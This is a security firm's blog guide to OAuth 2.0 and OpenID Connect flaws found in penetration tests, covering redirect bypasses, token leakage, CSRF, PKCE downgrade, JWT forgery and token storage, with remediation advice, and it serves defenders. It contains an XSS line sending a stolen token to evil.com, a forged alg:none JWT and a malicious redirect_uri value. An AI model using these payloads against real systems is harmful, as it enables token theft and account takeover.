OAuth 2.0 and OpenID Connect Security Vulnerabilities: What Pentesters Find in Real Assessments | Lorikeet Security Skip to main content
Back to Blog

OAuth 2.0 and OpenID Connect Security Vulnerabilities: What Pentesters Find in Real Assessments

Lorikeet Security Team April 9, 2026 52 min read

TL;DR: OAuth 2.0 and OpenID Connect power authentication and authorization for the majority of modern web applications, but their flexibility creates a massive attack surface when implementations deviate from security best practices. In our penetration testing engagements, we routinely find redirect URI bypasses, missing PKCE, token leakage through referrer headers and browser history, JWT validation failures including the alg:none attack, state parameter omissions enabling CSRF, scope escalation through parameter tampering, and insecure token storage in localStorage. This guide walks through every major OAuth/OIDC vulnerability class we encounter, explains the attack mechanics in detail, provides real-world examples from production applications, and gives concrete remediation guidance for each issue.


Why OAuth 2.0 and OpenID Connect Are Everywhere -- And Why They Are So Frequently Misconfigured

OAuth 2.0 has become the de facto standard for delegated authorization on the web. Published as RFC 6749 in 2012, it replaced a patchwork of proprietary authentication schemes with a single framework that allows users to grant third-party applications limited access to their resources without sharing credentials. OpenID Connect (OIDC), built as an identity layer on top of OAuth 2.0 and finalized in 2014, extended the framework to handle authentication as well, giving applications a standardized way to verify user identity and obtain basic profile information through ID tokens.

The adoption numbers are staggering. Every major identity provider -- Google, Microsoft Entra ID (formerly Azure AD), Okta, Auth0, AWS Cognito, Keycloak, PingIdentity -- implements OAuth 2.0 and OIDC. If your application supports "Sign in with Google" or "Sign in with Microsoft," you are using OIDC. If your API accepts bearer tokens, you are almost certainly using OAuth 2.0. If your mobile application authenticates against a backend API, the authorization code flow with PKCE is the recommended mechanism. SaaS platforms, fintech applications, healthcare portals, e-commerce sites, and internal enterprise tools all rely on these protocols for their core authentication and authorization mechanisms.

The problem is that OAuth 2.0 is a framework, not a protocol in the rigid sense. RFC 6749 deliberately leaves many implementation decisions to developers. It defines multiple grant types (authorization code, implicit, client credentials, resource owner password credentials), allows for extension grants, leaves redirect URI validation rules somewhat flexible, and does not mandate specific token formats. OIDC adds structure with JWTs and discovery endpoints, but it too allows significant implementation flexibility. This flexibility is what made OAuth 2.0 successful -- it can be adapted to web applications, mobile apps, single-page applications, IoT devices, and server-to-server communication. It is also what makes it dangerous.

When we conduct web application penetration tests, we find OAuth/OIDC misconfigurations in a significant majority of applications that implement these protocols. The reasons are consistent across engagements:

The consequence is that OAuth/OIDC vulnerabilities are not theoretical. They are practical, exploitable, and present in production applications right now. In this guide, we walk through every major vulnerability class we encounter in real penetration testing assessments, explain the attack mechanics, provide concrete exploitation techniques, and detail how to fix each issue.


Authorization Code Flow vs. Implicit Flow: A Security Analysis

Understanding the security properties of different OAuth 2.0 grant types is foundational to understanding why certain vulnerabilities exist. The two flows most relevant to web applications -- the authorization code flow and the implicit flow -- have fundamentally different security characteristics.

The Authorization Code Flow

The authorization code flow is the recommended grant type for server-side web applications and, when combined with PKCE, for single-page applications and mobile apps. The flow operates in two phases:

Phase 1 -- Authorization Request: The client application redirects the user's browser to the authorization server's /authorize endpoint with parameters including response_type=code, client_id, redirect_uri, scope, and state. The user authenticates with the authorization server and grants consent. The authorization server redirects the user back to the client's redirect_uri with a short-lived authorization code in the query string.

Phase 2 -- Token Exchange: The client application makes a back-channel (server-to-server) HTTP POST request to the authorization server's /token endpoint, presenting the authorization code along with its client_id and client_secret. The authorization server validates the code and credentials, then returns an access token (and optionally a refresh token and ID token) in the HTTP response body.

The security properties of this flow are significant. The access token is never exposed to the user's browser. It travels only over the back-channel between the client server and the authorization server. The authorization code is exposed in the browser's URL bar and potentially in server logs, but it is short-lived (typically 30-60 seconds), single-use, and cannot be exchanged for tokens without the client secret. An attacker who intercepts the authorization code through a referrer header or browser history still cannot obtain tokens without also compromising the client secret.

The Implicit Flow

The implicit flow was designed for browser-based applications (single-page applications) that could not securely store a client secret. Instead of returning an authorization code, the authorization server returns the access token directly in the URL fragment (#access_token=...) of the redirect URI. There is no back-channel token exchange.

The security problems with this approach are severe:

RFC 9700 (OAuth 2.0 Security Best Current Practice) explicitly states: "The implicit grant (response type 'token') and other response types causing the authorization server to issue access tokens in the authorization response are vulnerable to access token leakage and access token replay." The recommendation is clear: do not use the implicit flow. Use the authorization code flow with PKCE instead, even for single-page applications.

What we find in practice: Despite the implicit flow being formally deprecated for years, we still encounter it in approximately 20-30% of penetration testing engagements involving OAuth. The most common scenarios are legacy single-page applications built before PKCE adoption, applications using older versions of identity provider SDKs that default to the implicit flow, and applications where developers chose response_type=token because it required fewer steps to implement. Many identity providers (including some enterprise Entra ID configurations) still allow the implicit flow to be enabled with a single checkbox.

The Hybrid Flow

OIDC also defines hybrid flows that combine elements of both the authorization code and implicit flows. For example, response_type=code token returns both an authorization code and an access token in the front channel. While the authorization code can still be exchanged securely on the back channel, the access token exposed in the front channel suffers from all the same vulnerabilities as the implicit flow. Hybrid flows should be used with extreme caution, and in most cases, the pure authorization code flow with PKCE is preferable.


Redirect URI Validation Bypass Techniques

Redirect URI validation is the single most critical security control in the OAuth 2.0 authorization flow. When a user completes authentication, the authorization server redirects their browser back to the client application's redirect_uri along with an authorization code or token. If an attacker can manipulate the redirect_uri to point to a server they control, they receive the authorization code or token instead of the legitimate client.

RFC 6749 requires that the authorization server validate the redirect URI against pre-registered values. However, the specification allows for both exact match and partial match validation, and many implementations get this wrong. Here are the bypass techniques we use in penetration tests, ordered by frequency of success:

Subdomain Matching Bypass

Many authorization servers validate the redirect URI by checking if it matches the registered domain. If the registered redirect URI is https://app.example.com/callback, the server might accept any subdomain of example.com. An attacker who controls https://evil.example.com (perhaps through a subdomain takeover or a compromised subdomain) can set redirect_uri=https://evil.example.com/callback and receive the authorization code.

In practice, subdomain takeovers are extremely common. Organizations frequently have dangling DNS records pointing to deprovisioned cloud resources (AWS Elastic Beanstalk, Azure App Service, Heroku, GitHub Pages). If the CNAME record still exists but the resource has been deleted, an attacker can claim that resource and receive traffic for the subdomain. When combined with a loose redirect URI validation, this becomes a direct path to account takeover.

Path Traversal and Open Redirect Chains

If the authorization server validates only the scheme, host, and port of the redirect URI but allows arbitrary paths, an attacker can abuse open redirect vulnerabilities on the legitimate domain. Consider a registered redirect URI of https://app.example.com/oauth/callback. If the application has an open redirect at https://app.example.com/goto?url=https://evil.com, the attacker can set:

redirect_uri=https://app.example.com/goto?url=https://evil.com

The authorization server sees that the redirect URI is on app.example.com and accepts it. The user's browser follows the redirect to app.example.com/goto, which then redirects to evil.com with the authorization code or token in the URL. This is one of the most reliable bypass techniques because open redirect vulnerabilities are extremely common, and many security teams classify them as low-severity issues that do not warrant immediate remediation.

URL Parsing Inconsistencies

Different URL parsers handle edge cases differently, and these inconsistencies can be exploited to bypass redirect URI validation. Common techniques include:

Wildcard and Prefix Matching

Some identity providers allow wildcard patterns in redirect URI registrations. A registration like https://app.example.com/* or even https://*.example.com/callback gives attackers significant flexibility. Even without explicit wildcards, many authorization servers implement prefix matching, accepting any URL that begins with the registered redirect URI. If the registered URI is https://app.example.com/callback, the server might accept https://app.example.com/callback.evil.com or https://app.example.com/callback/../../../evil-path.

Localhost and Custom Scheme Bypasses

For mobile applications and desktop applications, OAuth 2.0 allows redirect URIs using custom URI schemes (e.g., myapp://callback) or http://localhost with a dynamic port. If the authorization server accepts http://localhost as a valid redirect URI for a web application, an attacker running a local HTTP server on the victim's machine (through malware or a compromised browser extension) can intercept the authorization code. Similarly, custom URI schemes on mobile platforms can be claimed by malicious applications through scheme hijacking on Android or through similar techniques on other platforms.

Pentester's note: When testing redirect URI validation, we always start by modifying the redirect_uri parameter systematically: changing the path, adding subdomains, injecting URL-encoded characters, testing with and without trailing slashes, adding query parameters, inserting fragments, and testing every URL parsing edge case. We also enumerate all open redirects on the application domain, as these are frequently the easiest path to a redirect URI bypass. Tools like Burp Suite's Collaborator can confirm out-of-band that redirected requests are reaching an attacker-controlled server.


Token Leakage via Referrer Headers, Browser History, and Logs

Even when the OAuth flow itself is implemented correctly, tokens and authorization codes can leak through side channels. Token leakage is a category of vulnerability where sensitive OAuth artifacts end up in locations accessible to attackers, often without any direct exploitation of the OAuth implementation itself.

Referrer Header Leakage

When the authorization server redirects the user back to the client application with an authorization code in the query string (e.g., https://app.example.com/callback?code=abc123&state=xyz), the full URL is stored in the browser as the current page's URL. If that callback page loads any external resources -- third-party JavaScript, analytics scripts, tracking pixels, social media widgets, or even a single image hosted on a CDN -- the browser sends the full URL in the Referer header to the server hosting that resource.

This means the authorization code is sent to every third-party server referenced by the callback page. If any of those third-party services are compromised, or if the third party logs referrer headers (which most analytics services do), the authorization code is available to the third party. If the authorization code has not yet been exchanged for tokens and has not expired, the third party can exchange it themselves.

The same issue affects the implicit flow even more severely. When the access token is in the URL fragment, it is accessible to any JavaScript on the page. While the fragment is not normally sent in the Referer header, any script on the callback page can read window.location.hash and transmit the token to an external server. If the callback page includes a compromised third-party script (a supply chain attack), the access token is immediately exfiltrated.

The mitigation for referrer leakage is straightforward: set the Referrer-Policy header to no-referrer or strict-origin on the callback page, and minimize external resources loaded on that page. Better yet, use the response_mode=form_post parameter, which causes the authorization server to deliver the authorization code via an HTTP POST to the callback URL rather than as a query parameter in a redirect. POST body parameters are never included in referrer headers.

Browser History Leakage

Every redirect in the OAuth flow creates an entry in the browser's history. The authorization code (in the query string) and tokens (in the URL fragment for implicit flows) are preserved in this history. On shared computers, kiosk terminals, or any device where multiple users access the same browser profile, this history is accessible to subsequent users. Even on personal devices, browser history is often synced across devices through browser profile synchronization (Chrome Sync, Firefox Sync, Safari iCloud), potentially exposing tokens on devices with weaker security controls.

After successfully exchanging the authorization code, the client application should immediately redirect the user to a clean URL (without the code in the query string) using history.replaceState() or a server-side redirect. This removes the authorization code from the browser's history and address bar. We frequently find that applications skip this step, leaving valid (or recently valid) authorization codes in the browser history indefinitely.

Server Log Leakage

Web server access logs typically record the full URL of every request, including query string parameters. If authorization codes are delivered via query string (the default for the authorization code flow), they are recorded in the web server logs of the client application. These logs are often stored in plaintext, retained for extended periods, accessible to operations and development teams, and may be shipped to centralized logging services (Splunk, ELK Stack, Datadog) where they are retained and indexed.

In one engagement, we found authorization codes stored in an Elasticsearch cluster that was accessible without authentication from the internal network. The codes were single-use and short-lived, so direct exploitation was not possible. However, the logging infrastructure also captured the full HTTP request including the Authorization: Bearer header for subsequent API calls. The access tokens in those logs were long-lived (24 hours) and could be replayed directly. This is a common pattern: even if the OAuth flow is secure, the tokens are only as secure as the infrastructure that handles them after issuance.

Error Page Leakage

When the OAuth callback encounters an error, many applications display a debug error page that includes the request parameters -- including the authorization code. If these error pages are served in production (a common misconfiguration), the authorization code is displayed in the page source and may be cached by CDNs, proxies, or search engine crawlers. We have also seen authorization codes leaked through stack traces in error reporting services like Sentry and Bugsnag, where the full request URL is captured as part of the error context.


State Parameter CSRF Attacks

The state parameter in OAuth 2.0 serves as a CSRF protection mechanism. Without it, an attacker can force a victim to complete an OAuth flow that links the victim's account to the attacker's identity provider account, or that authenticates the victim into the attacker's account on the client application.

How the Attack Works

The attack exploits the fact that the OAuth authorization flow involves a redirect from the client application to the authorization server and back. An attacker can initiate an OAuth flow, authenticate with their own credentials, receive an authorization code, and then trick the victim into completing the flow by visiting the callback URL with the attacker's authorization code.

Here is the step-by-step attack for a login CSRF scenario:

  1. The attacker initiates the OAuth login flow on the target application.
  2. The attacker authenticates with their own credentials at the identity provider.
  3. The identity provider redirects the attacker's browser to the callback URL: https://app.example.com/callback?code=ATTACKER_CODE.
  4. The attacker intercepts this redirect (using a proxy or by pausing the flow) and does not complete it.
  5. The attacker sends the callback URL to the victim (via email, chat, or embedding it in a web page as an image tag or iframe).
  6. The victim's browser follows the URL, and the target application exchanges the authorization code for tokens -- tokens associated with the attacker's account.
  7. The victim is now logged into the application as the attacker. Any data the victim enters (personal information, payment details, documents) is accessible to the attacker.

This is known as "login CSRF" and is more common than many developers realize. The impact depends on the application: in a note-taking application, the attacker sees everything the victim writes. In a financial application, the victim might link their bank account to the attacker's session. In a cloud storage application, the victim uploads sensitive files to the attacker's account.

Account Linking CSRF

A more dangerous variant occurs when an application allows linking multiple identity providers to a single account (e.g., "Connect your Google account" or "Link your GitHub account"). If the linking flow does not verify the state parameter, an attacker can force the victim to link the attacker's identity provider account to the victim's application account. After the link is complete, the attacker can log in as the victim using their own identity provider credentials.

We find this vulnerability frequently in applications that allow social login connections. The "connect" flow is often implemented as an afterthought, with less rigorous security review than the primary login flow.

Proper State Parameter Implementation

The state parameter must be:

What we find in practice: The most common state parameter issues we encounter are: (1) the state parameter is omitted entirely, (2) the state parameter is present but not validated on the callback, (3) the state parameter is a predictable value like the user's session ID or a sequential counter, (4) the state parameter is validated but not bound to the session (stored in localStorage where it can be overwritten by the attacker through XSS), and (5) the state parameter is correctly implemented for the login flow but missing from account linking or re-authorization flows.


Scope Escalation and Consent Screen Bypass

OAuth 2.0 scopes define the level of access that a client application requests. When a user authorizes an application, the consent screen displays the requested scopes (e.g., "This application wants to read your email" or "This application wants to manage your repositories"). The user can then make an informed decision about whether to grant access. Scope escalation attacks attempt to obtain broader access than the user intended to grant.

Scope Parameter Tampering

The most straightforward scope escalation attack involves modifying the scope parameter in the authorization request. If a legitimate application requests scope=email profile, an attacker who controls the authorization request (through a man-in-the-middle position, XSS, or by directly crafting a malicious link) can change it to scope=email profile admin or scope=email profile https://www.googleapis.com/auth/admin.directory.user.

Whether this works depends on the authorization server's behavior. Well-configured authorization servers will display the elevated scope on the consent screen, giving the user an opportunity to reject the request. However, several scenarios bypass this protection:

Consent Screen Bypass

Some OAuth implementations allow bypassing the consent screen entirely under certain conditions:

Token Scope Verification Failures

Even when scopes are properly requested and consented, the resource server (API) must verify that the access token's scope is sufficient for the requested operation. In many implementations, the resource server does not validate scopes at all -- any valid access token is accepted for any API endpoint, regardless of the scopes it was granted. This effectively makes scopes a cosmetic feature rather than a security control.

In one engagement, we obtained an access token with scope=read and successfully used it to call write and delete API endpoints because the API gateway only verified the token's signature and expiration, not its scope claims. This is particularly common in microservice architectures where each service validates the JWT independently but only checks the signature, not the payload claims.


PKCE: What It Solves and When It Is Missing

Proof Key for Code Exchange (PKCE, pronounced "pixie") was introduced in RFC 7636 to address a specific vulnerability in the authorization code flow: authorization code interception. While the authorization code flow is more secure than the implicit flow because the access token is exchanged on the back channel, the authorization code itself is still delivered through the front channel (the user's browser) and can be intercepted.

The Authorization Code Interception Problem

In the standard authorization code flow without PKCE, the security of the flow relies on two factors: possession of the authorization code and possession of the client secret. For confidential clients (server-side applications), the client secret is stored securely on the server, and an attacker who intercepts the authorization code cannot exchange it without the secret.

But for public clients -- mobile applications, single-page applications, desktop applications -- there is no client secret. The application's source code is accessible to the user (and therefore to attackers), so any embedded secret can be extracted. Without a client secret, the only thing preventing an attacker from exchanging a stolen authorization code is the code itself.

Authorization code interception can happen in several ways:

How PKCE Works

PKCE adds a proof-of-possession mechanism to the authorization code flow. The process works as follows:

  1. The client generates a cryptographically random string called the code_verifier (between 43 and 128 characters from the unreserved character set).
  2. The client computes the code_challenge by applying a SHA-256 hash to the code_verifier and Base64URL-encoding the result. (The plain method -- where the challenge equals the verifier -- is also defined but provides weaker security.)
  3. The client includes the code_challenge and code_challenge_method=S256 in the authorization request.
  4. The authorization server stores the code_challenge associated with the authorization code it issues.
  5. When the client exchanges the authorization code for tokens, it includes the original code_verifier in the token request.
  6. The authorization server hashes the received code_verifier, compares it to the stored code_challenge, and only issues tokens if they match.

The key insight is that the code_challenge is sent in the authorization request (which is public), but the code_verifier is sent only in the token exchange request (which is direct from client to server). An attacker who intercepts the authorization code does not have the code_verifier and cannot compute it from the code_challenge (because SHA-256 is a one-way function). Therefore, the intercepted authorization code is useless.

When PKCE Is Missing

Despite being recommended for all clients (including confidential clients) since RFC 9700, PKCE adoption remains incomplete. In our assessments, we find PKCE missing in the following scenarios:

Critical finding: The PKCE downgrade attack is one of the most underappreciated OAuth vulnerabilities. We have encountered multiple identity providers where PKCE is "supported" but not "enforced." In these configurations, PKCE provides no security benefit because an attacker can simply strip the PKCE parameters from the authorization request. Always verify that the authorization server is configured to require PKCE, not merely accept it.


JWT Validation Failures: alg:none, Key Confusion, and Signature Stripping

JSON Web Tokens (JWTs) are the standard token format for OpenID Connect ID tokens and are widely used for OAuth 2.0 access tokens. A JWT consists of three Base64URL-encoded parts separated by periods: the header (specifying the algorithm and token type), the payload (containing claims like issuer, subject, audience, and expiration), and the signature. The security of JWTs depends entirely on proper signature validation. When validation is flawed, attackers can forge tokens and impersonate any user.

The alg:none Attack

The JWT specification (RFC 7519) defines an "unsecured JWT" where the algorithm in the header is set to "alg": "none" and the signature section is empty. This was intended for use cases where the JWT is transported over a secure channel and integrity is guaranteed by other means. In practice, this feature has been a source of critical vulnerabilities.

The attack is simple: take a valid JWT, decode the header, change the alg field to "none", modify the payload claims as desired (e.g., change the sub claim to an administrator's user ID), re-encode the header and payload, and remove the signature (leaving the trailing period). If the server accepts alg:none, the forged token is accepted as valid.

# Original JWT header
{"alg": "RS256", "typ": "JWT"}

# Modified header
{"alg": "none", "typ": "JWT"}

# Forged token (note the empty signature after the trailing period)
eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJzdWIiOiJhZG1pbiIsImlhdCI6MTcxMjYyMDgwMH0.

This vulnerability was first widely publicized in 2015 when Auth0 researcher Tim McLean discovered that many JWT libraries, including the widely-used jsonwebtoken (Node.js), PyJWT (Python), and ruby-jwt (Ruby), accepted alg:none by default. The affected libraries have since been patched, but custom JWT validation code, older library versions, and misconfigured validation settings continue to exhibit this vulnerability.

Variations of the alg:none attack include using different capitalizations ("None", "NONE", "nOnE") to bypass case-sensitive blocklists, and using URL-encoding or whitespace padding to evade signature checks.

RSA/HMAC Key Confusion (Algorithm Substitution)

This attack exploits a fundamental difference between symmetric and asymmetric signature algorithms. When a JWT is signed with RSA (e.g., RS256), the authorization server uses its private key to sign the token, and the client or resource server uses the corresponding public key to verify the signature. The public key is, by definition, public -- it is often available at the authorization server's JWKS endpoint (/.well-known/jwks.json).

When a JWT is signed with HMAC (e.g., HS256), the same secret key is used for both signing and verification.

The attack works as follows:

  1. The target application normally uses RS256 to verify JWTs and is configured with the authorization server's RSA public key.
  2. The attacker obtains the RSA public key (from the JWKS endpoint or the server's TLS certificate).
  3. The attacker creates a JWT with "alg": "HS256" in the header and the desired claims in the payload.
  4. The attacker signs the JWT using HMAC-SHA256 with the RSA public key as the HMAC secret.
  5. When the server receives the token, a vulnerable JWT library reads the alg header, sees HS256, and uses the configured key (the RSA public key) as the HMAC verification key. Since the attacker signed the token with the same key, the signature is valid.

This attack is devastating because the RSA public key is public knowledge, meaning any attacker can forge valid tokens for any user. The fix is straightforward: the verification code must enforce the expected algorithm and never trust the alg header from the token itself. Modern JWT libraries provide an algorithms parameter that restricts which algorithms are accepted during verification.

Signature Stripping

Some JWT implementations have a flaw where they validate the signature only if one is present. If the signature section of the JWT is completely removed (not just empty, but absent -- resulting in only two Base64URL-encoded sections separated by a single period), the validation logic may treat the token as unsigned and accept it without any verification.

This differs from the alg:none attack in that the header may still specify RS256 or another algorithm, but the signature is simply not present. The vulnerable code path typically looks like:

parts = token.split('.')
if len(parts) == 3:
    verify_signature(parts[0], parts[1], parts[2])
# If only 2 parts, signature verification is skipped entirely
payload = decode(parts[1])

JWK Injection and jku/x5u Header Manipulation

The JWT header can include a jwk (JSON Web Key) claim that embeds the verification key directly in the token, a jku (JWK Set URL) claim that points to a URL containing the verification keys, or an x5u (X.509 URL) claim that points to a certificate chain. If the verification code trusts these claims without restriction:

Mitigations include ignoring jwk, jku, and x5u headers in incoming tokens, using locally configured keys for verification, and if JWKS URLs must be dynamic, restricting them to a whitelist of trusted URLs.

Expired and Replayed Tokens

JWTs include an exp (expiration time) claim, but not all servers validate it. We regularly find servers that accept expired tokens, sometimes months or years after they were issued. Combined with token leakage from logs or browser history, this means that old tokens can be replayed to gain access.

Similarly, the aud (audience) claim should be validated to ensure the token was intended for the specific resource server. If a token issued for api-a.example.com is accepted by api-b.example.com, an attacker with access to any service in the ecosystem can use their tokens to access other services. This is known as a confused deputy attack.

Testing approach: When we test JWT validation, we use a systematic methodology: (1) test alg:none with multiple capitalizations, (2) test RSA/HMAC key confusion if the public key is available, (3) test JWK injection and JKU/X5U manipulation, (4) test with expired tokens, (5) test with tokens issued for a different audience, (6) modify individual claims (sub, role, permissions) and verify whether the server detects tampering, (7) test with completely invalid signatures to ensure signature verification is not bypassed. Tools like jwt_tool by ticarpi automate many of these tests.


Token Storage Mistakes: localStorage vs. httpOnly Cookies

How and where an application stores OAuth tokens after obtaining them is a critical security decision. The two most common storage mechanisms for browser-based applications are localStorage and HTTP-only cookies, and they have fundamentally different security properties.

The localStorage Problem

localStorage is a browser API that provides persistent key-value storage per origin. It is synchronous, easy to use, and available in all modern browsers. It is also the most common token storage mechanism we find in single-page applications. Unfortunately, it is also the least secure.

The fundamental problem with localStorage is that it is accessible to any JavaScript running on the page. If an attacker achieves cross-site scripting (XSS) on the application, they can read every token stored in localStorage with a single line of JavaScript:

// Attacker's XSS payload
fetch('https://evil.com/steal?token=' + localStorage.getItem('access_token'));

XSS vulnerabilities are extremely common. They appear in the OWASP Top 10 and are present in a substantial percentage of the web applications we test. Storing tokens in localStorage means that any XSS vulnerability -- reflected, stored, or DOM-based -- is automatically escalated to a complete account takeover. The attacker does not need to perform any additional steps; they simply read the token and use it from their own machine.

Additional problems with localStorage:

sessionStorage -- Marginally Better

sessionStorage is similar to localStorage but scoped to the browser tab and cleared when the tab is closed. This mitigates the persistence and shared device risks, but it is still fully accessible to JavaScript and therefore vulnerable to XSS. It is a marginal improvement, not a solution.

HTTP-Only Secure Cookies

The recommended approach for browser-based applications is to store tokens in HTTP-only, secure, same-site cookies. The security properties are significant:

The Backend-for-Frontend (BFF) Pattern

For single-page applications that use an authorization code flow, the recommended architecture is the Backend-for-Frontend (BFF) pattern. In this pattern, the SPA communicates with a lightweight backend server (the BFF) that handles the OAuth flow. The BFF stores the access token and refresh token server-side (in a session store), and the SPA authenticates to the BFF using an HTTP-only session cookie. The access token never reaches the browser.

This pattern provides the strongest security because tokens are never exposed to client-side JavaScript. The BFF acts as a confidential client (it has a client secret), can use PKCE for additional protection, and can implement token rotation and revocation without relying on client-side logic. The main drawback is the additional infrastructure complexity of maintaining a backend server for what would otherwise be a purely client-side application.

What we report: When we find tokens stored in localStorage, we report it as a medium-severity finding if no XSS vulnerability is present (because the risk is conditional on XSS), and as a high-severity finding if XSS is also present (because the combination enables direct account takeover). We always recommend migrating to HTTP-only cookies or the BFF pattern regardless of whether XSS is currently present, because XSS is a when-not-if proposition for most web applications.


Real-World Examples of OAuth Vulnerabilities in Production Applications

OAuth and OIDC vulnerabilities are not limited to small or poorly-maintained applications. Some of the most significant security incidents in major technology platforms have involved OAuth flaws. These examples illustrate the real-world impact of the vulnerability classes discussed in this article.

Facebook: OAuth Redirect URI Bypass Leading to Account Takeover (2013-2020, multiple instances)

Facebook's OAuth implementation has been a repeated target for security researchers. In 2013, researcher Nir Goldshlager discovered a series of redirect URI bypasses in Facebook's OAuth flow. By chaining open redirects on facebook.com subdomains with the OAuth authorization endpoint, he was able to steal access tokens for any Facebook user who clicked a malicious link. The attack chain leveraged the fact that Facebook allowed redirect URIs to any facebook.com subdomain, and several of these subdomains had open redirect vulnerabilities.

In subsequent years, multiple researchers found similar bypasses, including one in 2020 that leveraged a redirect URI validation flaw in combination with a dangling CNAME for a Facebook subdomain. Facebook paid significant bug bounties for these findings, but the pattern illustrates how difficult it is to get redirect URI validation right, even for organizations with world-class security teams.

Microsoft: Azure AD/Entra ID OAuth Misconfigurations

Microsoft's Entra ID (formerly Azure Active Directory) has been the subject of several high-profile OAuth security findings. In 2019, researchers from CyberArk demonstrated that misconfigured multi-tenant applications in Azure AD could be used to access other tenants' data by exploiting the consent framework. The attack involved registering a malicious application in one tenant, configuring it as multi-tenant, and tricking users in other tenants into granting consent. Because Azure AD's default settings allowed users to consent to applications requesting basic permissions, the attack could be executed without any administrator involvement.

In 2021, the "nOAuth" vulnerability demonstrated how a common misconfiguration in Azure AD OIDC integrations could lead to account takeover. Many applications used the email claim from Azure AD ID tokens as the unique identifier for users. However, Azure AD allows users to set arbitrary email addresses in their profile, and does not guarantee that the email claim has been verified. An attacker could set their Azure AD profile email to the victim's email address, authenticate to the target application via OIDC, and the application would match them to the victim's account based on the email claim. Microsoft's guidance was updated to recommend using the sub (subject) claim or oid (object ID) as the user identifier, as these are immutable and unique.

Slack: OAuth Token Leakage via Referer Headers (2019)

Security researcher Evan Custodio discovered that Slack's OAuth implementation leaked access tokens through referrer headers. When a user completed the OAuth flow for a Slack application, the callback page included third-party tracking scripts. The full callback URL, including the authorization code, was sent to these third-party servers via the Referer header. While the authorization codes were short-lived, the timing window was sufficient for automated exploitation. Slack fixed the issue by implementing Referrer-Policy: no-referrer on their callback pages and switching to response_mode=form_post.

GitHub: OAuth State Parameter Bypass (2012)

In one of the earliest and most impactful OAuth CSRF attacks, researcher Egor Homakov demonstrated a login CSRF vulnerability in GitHub's OAuth implementation. GitHub's "Sign in with GitHub" flow for third-party applications did not validate the state parameter. Homakov was able to force other users to link their GitHub accounts to his third-party application, giving him access to their private repositories. This finding led to widespread awareness of the state parameter's importance and prompted many OAuth libraries to include state validation by default.

Google: OAuth Scope Escalation in Google Apps Script

In 2017, a sophisticated phishing attack leveraged Google's OAuth consent flow to trick users into granting a malicious application full access to their Gmail accounts. The attack used a legitimate-looking application named "Google Docs" that requested the https://mail.google.com/ scope, which grants complete access to the user's Gmail. The consent screen showed the request was from "Google Docs" (a name the attacker chose, not the official Google application), and many users approved it without reading the scope details. This attack demonstrated that consent screens alone are insufficient to prevent scope-based attacks when users are conditioned to click "Allow" without reading the fine print.

Various Bug Bounty Programs: JWT alg:none in Production

The alg:none JWT vulnerability has been reported in bug bounty programs for numerous major organizations. In 2020, a researcher discovered that a major financial institution's API gateway accepted JWTs with alg:none, allowing them to forge tokens as any user, including administrators. The root cause was that the API gateway used an outdated JWT library that accepted unsigned tokens by default. In another case, a healthcare platform's API accepted alg:none tokens, enabling access to patient medical records. These findings consistently receive critical severity ratings in bug bounty programs.

Lessons From the Real World

Several patterns emerge from these real-world examples:


How Organizations Should Configure OAuth 2.0 and OpenID Connect

Based on our penetration testing experience and the current security best practices defined in RFC 9700 (OAuth 2.0 Security Best Current Practice) and the OpenID Connect specifications, here are the concrete steps organizations should take to secure their OAuth/OIDC implementations.

Authorization Server Configuration

Client Application Configuration

Resource Server (API) Configuration

Identity Provider Selection and Configuration


Common OAuth 2.0 and OIDC Vulnerabilities: Severity, Frequency, and Impact

The following table summarizes the most common OAuth/OIDC vulnerabilities we discover during penetration testing engagements, their typical severity ratings, how frequently we encounter them, and their potential impact.

Vulnerability Severity Frequency Impact
Redirect URI Validation Bypass Critical Common Authorization code or token theft leading to full account takeover
Missing PKCE Enforcement High Very Common Authorization code interception on public clients; defense-in-depth failure on confidential clients
Implicit Flow in Use High Common Token exposure via browser history, referrer headers, and XSS
Missing or Invalid State Parameter Medium-High Very Common Login CSRF, account linking CSRF, session fixation
JWT alg:none Accepted Critical Uncommon Complete token forgery; impersonate any user including administrators
JWT RSA/HMAC Key Confusion Critical Uncommon Complete token forgery using publicly available key material
JWT Signature Not Verified Critical Rare Complete token forgery; arbitrary claim modification
Tokens in localStorage Medium Very Common Token theft via XSS; escalates XSS to full account takeover
Token Leakage via Referrer Medium Common Authorization code or token exposure to third-party servers
Scope Not Validated by API High Common Privilege escalation; access to unauthorized API operations
Scope Escalation via Parameter Tampering High Moderate Elevated access beyond user consent; data exfiltration
Expired Tokens Accepted Medium Common Session replay; unauthorized access using stale credentials
Audience Claim Not Validated Medium-High Common Cross-service token replay; confused deputy attacks
PKCE Downgrade Attack High Moderate Negates PKCE protection; enables authorization code interception
Consent Screen Bypass Medium-High Moderate Silent scope escalation; unauthorized data access without user awareness
JWK/JKU Header Injection Critical Rare Complete token forgery via attacker-controlled verification key
Refresh Token Not Rotated Medium Common Persistent access if refresh token is compromised; no detection mechanism
Client Secret Exposed High Moderate Allows attacker to impersonate the client; exchange stolen authorization codes

Several observations are worth noting from this data. The most critical vulnerabilities (alg:none, key confusion, JWK injection) are fortunately rare in modern applications because JWT libraries have improved their defaults. However, the most common vulnerabilities (missing PKCE, missing state parameter, tokens in localStorage, scope not validated) are widespread precisely because they are not dramatic failures -- they are misconfigurations and omissions that do not cause visible errors. Applications work perfectly with these issues present, and they are only discovered through security testing.

The combination of high-frequency, medium-severity vulnerabilities (like tokens in localStorage) with common but often low-priority vulnerabilities (like XSS) produces critical-impact attack chains. This is why OAuth security testing must be holistic: evaluating each component in isolation misses the compounding effect of combined vulnerabilities.


Advanced OAuth Attack Techniques Pentesters Should Know

Beyond the core vulnerability classes, several advanced attack techniques target specific aspects of OAuth/OIDC implementations. These techniques are commonly used in sophisticated penetration tests and red team engagements.

Authorization Code Injection

Authorization code injection is an attack where an attacker injects their own authorization code into a victim's OAuth flow. This is different from authorization code interception (where the attacker steals the victim's code). In an injection attack, the attacker initiates an OAuth flow, obtains their own authorization code, and then tricks the victim's browser into sending this code to the client's callback endpoint. If the client does not validate the state parameter (or if PKCE is not enforced), the client exchanges the attacker's code for the attacker's tokens and creates a session associated with the attacker's identity.

The impact depends on the application's behavior. If the application links the OAuth identity to the victim's existing session, the victim's account is now linked to the attacker's identity provider account, giving the attacker persistent access. This is a more sophisticated version of the CSRF attack described in the state parameter section, and it specifically targets applications where OAuth is used for account linking rather than primary authentication.

Token Replay Across Services

